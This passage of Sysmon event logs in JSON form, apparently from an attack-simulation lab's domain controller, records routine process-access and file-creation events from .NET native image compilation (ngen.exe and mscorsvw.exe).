C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010E4030B00}","TargetProcessId":"5108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7360,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.215\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010DD060B00}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.215","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010DD060B00}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7361,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.215\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010DD060B00}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.215","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010DD060B00}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7362,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.230\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010DD060B00}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.230","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010DD060B00}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7363,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:52.308\r\nProcessGuid: {E2A3D6B1-1324-5F25-0000-0010DD060B00}\r\nProcessId: 4836\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12e4-0\\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll\r\nCreationUtcTime: 2020-08-01 07:00:52.308","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:52.308","ProcessGuid":"{E2A3D6B1-1324-5F25-0000-0010DD060B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12e4-0\\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll","CreationUtcTime":"2020-08-01 07:00:52.308","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7364,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.308\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00100E0A0B00}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.308","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00100E0A0B00}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7365,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.308\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00100E0A0B00}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.308","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00100E0A0B00}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7366,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.324\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-00100E0A0B00}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.324","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-00100E0A0B00}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7367,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.355\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010820D0B00}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.355","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010820D0B00}","TargetProcessId":"4440","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dl